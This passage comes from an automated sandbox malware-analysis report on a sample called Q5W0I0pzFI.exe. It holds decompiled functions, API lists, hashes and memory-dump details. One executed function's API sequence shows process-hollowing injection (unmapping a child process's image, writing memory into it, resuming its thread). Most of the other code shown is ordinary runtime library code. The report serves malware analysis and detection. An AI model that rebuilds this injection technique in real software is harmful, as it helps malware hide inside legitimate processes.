				_t35 = _t23 -  *0x50ad20; // 0xcafe2c1d
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0xcafe2c1d
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0x3501d3e2
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a784
0x0042a786
0x0042a786
0x0042ab89
0x0042ab93
0x0042ab9a
0x0042ab9e
0x0042ab9f
0x0042ab9f
0x0042aba1
0x0042aba6
0x0042abac
0x0042abb2
0x0042abb8
0x0042abbe
0x0042abc4
0x0042abcb
0x0042abd2
0x0042abd9
0x0042abe0
0x0042abe7
0x0042abee
0x0042abef
0x0042abf8
0x0042ac00
0x0042ac08
0x0042ac13
0x0042ac1d
0x0042ac22
0x0042ac27
0x0042ac31
0x0042ac3b
0x0042ac47
0x0042ac4b
0x0042ac57
0x0042ac5b
0x0042ac61
0x0042ac67
0x0042ac6b
0x0042ac71
0x0042ac82

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

0x00413c40
0x00413c44
0x00413c46
0x00413c47
0x00413c4a
0x00413c50
0x00413c57
0x00413c60
0x00413c8e
0x00413c93
0x00413c62
0x00413c62
0x00413c65
0x00413c96
0x00413c9b
0x00000000
0x00413c67
0x00413c68
0x00413c6d
0x00413c72
0x00413ca0
0x00413ca0
0x00413ca5
0x00413ca6
0x00413ca7
0x00413ca8
0x00413ca9
0x00413caa
0x00413cab
0x00413cac
0x00413cad
0x00413cae
0x00413caf
0x00413cb0
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413cba
0x00413cc2
0x00413cc8
0x00413ccf
0x00413ccf
0x00413cd7
0x00413c74
0x00413c78
0x00413c7d
0x00413c80
0x00413c83
0x00413c8b
0x00000000
0x00413c8b
0x00413c72
0x00413c65

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 05d5d7b884b90dafa29f54ad3aa649d83378d0d9fb225d1832a611f5fd1e99ec
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 05d5d7b884b90dafa29f54ad3aa649d83378d0d9fb225d1832a611f5fd1e99ec
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

0x00480621
0x00480626
0x00480628
0x0048062c
0x0048063d
0x00480642
0x00480642
0x0048064f
0x00480651
0x00480655
0x00480658
0x0048065c
0x00480663
0x00480663
0x00480667
0x0048066c
0x0048066f
0x00480674
0x00480679
0x00480679
0x00480686
0x00480692

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
.\crypto\evp\digest.c, xrefs: 00480638

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042793D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 23%

			E0042793D(intOrPtr* __eax, char _a4) {

				__imp__DecodePointer( *0x510444);
				if(__eax == 0) {
					L3:
					return 0;
				} else {
					_t1 =  &_a4; // 0x423b69
					_push( *_t1);
					if( *__eax() == 0) {
						goto L3;
					} else {
						return 1;
					}
				}
			}

0x00427946
0x0042794e
0x0042795f
0x00427962
0x00427950
0x00427950
0x00427950
0x00427958
0x00000000
0x0042795a
0x0042795e
0x0042795e
0x00427958

APIs

DecodePointer.KERNEL32(?,00420CE3,i;B,?,?,00423B69,?), ref: 00427946

Strings

i;B, xrefs: 00427950
0Ow`R, xrefs: 00427946

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: 0Ow`R$i;B
API String ID: 3527080286-1116011043
Opcode ID: 7c4a3e48be66a94cd36ccbde3be84013c7981e0a81d5113b9db441012b1e4d18
Instruction ID: 92d9859bf502b6ebb1d54d1cb9c8540d085fdb66547338da5f26df237df51bed
Opcode Fuzzy Hash: 7c4a3e48be66a94cd36ccbde3be84013c7981e0a81d5113b9db441012b1e4d18
Instruction Fuzzy Hash: 0FD0123275822A6BBF405BF2FC006273F9DDB422B43444072E50CC0571EE66DD609558

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0044F23E(void* __eflags, char _a4) {
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v60;
				intOrPtr _v68;
				char _v92;
				char _v100;
				char _v120;
				void* _t58;
				void* _t63;
				void* _t64;
				void* _t65;

				_t58 = _t63;
				_t64 = _t63 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6554;
				E00430ECA( &_v16, 0x5081fc);
				asm("int3");
				_push(_t58);
				_t65 = _t64 - 0xc;
				E00430CFC( &_v32,  &_v12);
				_v32 = 0x4d6560;
				E00430ECA( &_v32, 0x508238);
				asm("int3");
				_push(_t64);
				E00430CFC( &_v60,  &_v40);
				_v60 = 0x4d6578;
				E00430ECA( &_v60, 0x508274);
				asm("int3");
				_push(_t65);
				E0044EF74( &_v92, _v68);
				E00430ECA( &_v92, 0x508320);
				asm("int3");
				_push(_t65 - 0xc);
				E00430CFC( &_v120,  &_v100);
				_v120 = 0x4d656c;
				E00430ECA( &_v120, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f23f
0x0044f241
0x0044f251
0x0044f25e
0x0044f266
0x0044f26b
0x0044f26c
0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F247, 0044F25B

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Q5W0I0pzFI.exePID: 2420, Parent PID: 6496COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	45.8%
Total number of Nodes:	24
Total number of Limit Nodes:	7

Executed Functions

Function 02150110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02150156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0215016C
CreateProcessA.KERNELBASE(?,00000000), ref: 02150255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02150270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02150283
GetThreadContext.KERNELBASE(00000000,?), ref: 0215029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021502C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021502E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02150304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0215032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02150399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021503BF
SetThreadContext.KERNELBASE(00000000,?), ref: 021503E1
ResumeThread.KERNELBASE(00000000), ref: 021503ED
ExitProcess.KERNEL32(00000000), ref: 02150412

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: badb9cfff7083f189cebfc118c30fc1ec1c26ca97efe3440d8b79b041fd66de0
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 02B1B774A00208EFDB44CF98C895F9EBBB5BF88314F248158E909AB391D771AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02150420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02150533

Strings

mfoaskdfnoa, xrefs: 02150520, 02150523
0, xrefs: 02150492
saodkfnosa9uin, xrefs: 021504DA
d, xrefs: 02150584

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: f525a2f1054087e6a9bc3e3c5ee6a5c41a0b1efbec5f1f01a4d6fdc35c0111cc
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: FD510970D48388DEEB11CBE8C849BDDBFB26F19708F144098D5546F286C3FA5658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 021505B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 021505EC

Strings

apfHQ, xrefs: 021505E2, 021505E5
o, xrefs: 02150600

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 7bbcb7f5095587eaf837e1bb9fc59a9a2f27fb1523320d3af33a20ad5fd998e7
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: C7011E70C0425CEEDB14DBD8C5183AEBFB5AF49308F1480D9C8192B241D7769B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02150042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: ad5845be4e31025f0358999962c490cee75432e27781322b8692d3713aee6fb8
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 0E115E72380110DFD754DEA5DC91EA673AAEF8C360B198195ED18CB311D776E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 02173F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02173F51

Part of subcall function 02175BA8: __getptd_noexit.LIBCMT ref: 02175BA8

__gmtime64_s.LIBCMT ref: 02173FEA
__gmtime64_s.LIBCMT ref: 02174020
__gmtime64_s.LIBCMT ref: 0217403D
__allrem.LIBCMT ref: 02174093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021740AF
__allrem.LIBCMT ref: 021740C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021740E4
__allrem.LIBCMT ref: 021740FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02174119
__invoke_watson.LIBCMT ref: 0217418A

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 9ba277696e2e8addf84e4cd0363ad57495995945bcdd8b174406ac968ed4ae62
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 74711D71A8071AAFE714EE79CC80B6AB3B9BF94364F144179E424E7680E770E9448FD1

Uniqueness

Uniqueness Score: -1.00%

Function 021784AB Relevance: 16.6, APIs: 11, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 021784B1
_free.LIBCMT ref: 021784E2
_free.LIBCMT ref: 021784F5
_free.LIBCMT ref: 02178513
_free.LIBCMT ref: 02178525
_free.LIBCMT ref: 02178536
_free.LIBCMT ref: 02178541
_free.LIBCMT ref: 02178565
_free.LIBCMT ref: 02178581
_free.LIBCMT ref: 02178597
_free.LIBCMT ref: 021785BF

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: 4ae3d96613b79f6c82f063e7254c3e5350a375eddbf5869e8af2ec2bb54e56b9
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 4531C331980250EFCF25AF14FC8894977B6FB95324B05863AED09572B0CBB499C9BF94

Uniqueness

Uniqueness Score: -1.00%

Function 0219FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::exception::exception.LIBCMT ref: 0219FC1F
__CxxThrowException@8.LIBCMT ref: 0219FC34
std::exception::exception.LIBCMT ref: 0219FC4D
__CxxThrowException@8.LIBCMT ref: 0219FC62
std::regex_error::regex_error.LIBCPMT ref: 0219FC74

Part of subcall function 0219F914: std::exception::exception.LIBCMT ref: 0219F92E

__CxxThrowException@8.LIBCMT ref: 0219FC82
std::exception::exception.LIBCMT ref: 0219FC9B
__CxxThrowException@8.LIBCMT ref: 0219FCB0

Strings

leM, xrefs: 0219FCA8

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
String ID: leM
API String ID: 2862078307-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 31929335843b859d6e87720578d06b8b720e1d533a9c527e9c61162cf29c5593
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 0511FE79C4020DBBCF00FFA5D499CDEBB7DAB04344F508966AD5897640EB74A3498F94

Uniqueness

Uniqueness Score: -1.00%

Function 0215F010 Relevance: 15.1, APIs: 10, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0215F01F

Part of subcall function 02171602: __FF_MSGBANNER.LIBCMT ref: 02171619
Part of subcall function 02171602: __NMSG_WRITE.LIBCMT ref: 02171620

_malloc.LIBCMT ref: 0215F02B
_wprintf.LIBCMT ref: 0215F03E
_free.LIBCMT ref: 0215F044
_free.LIBCMT ref: 0215F065
_malloc.LIBCMT ref: 0215F06D
_sprintf.LIBCMT ref: 0215F0C0
_wprintf.LIBCMT ref: 0215F0D2
_wprintf.LIBCMT ref: 0215F0DC
_free.LIBCMT ref: 0215F0E5

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: ab1546f0b5fd2546aed471acf3e14c85740f94ada525519a95ce3fdee1339425
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: BB1127B25805607EC36166B40C11FFF3BFE9F86301F0800A9FE5CD1180DB585A0597B1

Uniqueness

Uniqueness Score: -1.00%

Function 02161960 Relevance: 13.6, APIs: 9, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 021619C6
__CxxThrowException@8.LIBCMT ref: 021619F1
__CxxThrowException@8.LIBCMT ref: 02161A1A
__CxxThrowException@8.LIBCMT ref: 02161A4B
_memset.LIBCMT ref: 02161A6A
__CxxThrowException@8.LIBCMT ref: 02161A90
_malloc.LIBCMT ref: 02161AA0
_memset.LIBCMT ref: 02161AAB
_sprintf.LIBCMT ref: 02161ACE

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: d165944092d0eece7a0cb7138676bba270d340a43715cbc6a14642cb90f24e22
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 35513B71D80209BBDB11DBA5DC8AFEFBBB9FB04744F100025F909B6280E7755A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0215F210 Relevance: 10.7, APIs: 7, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBCMT ref: 0215F284
__CxxThrowException@8.LIBCMT ref: 0215F2AF
__CxxThrowException@8.LIBCMT ref: 0215F2DE
__CxxThrowException@8.LIBCMT ref: 0215F30F
_memset.LIBCMT ref: 0215F32E
__CxxThrowException@8.LIBCMT ref: 0215F354
_sprintf.LIBCMT ref: 0215F373

Memory Dump Source

Source File: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2150000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: ab06448ad2d866a02f3e638b1ccb080316686a27e3603b44d82ba4b83bf8ae96
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
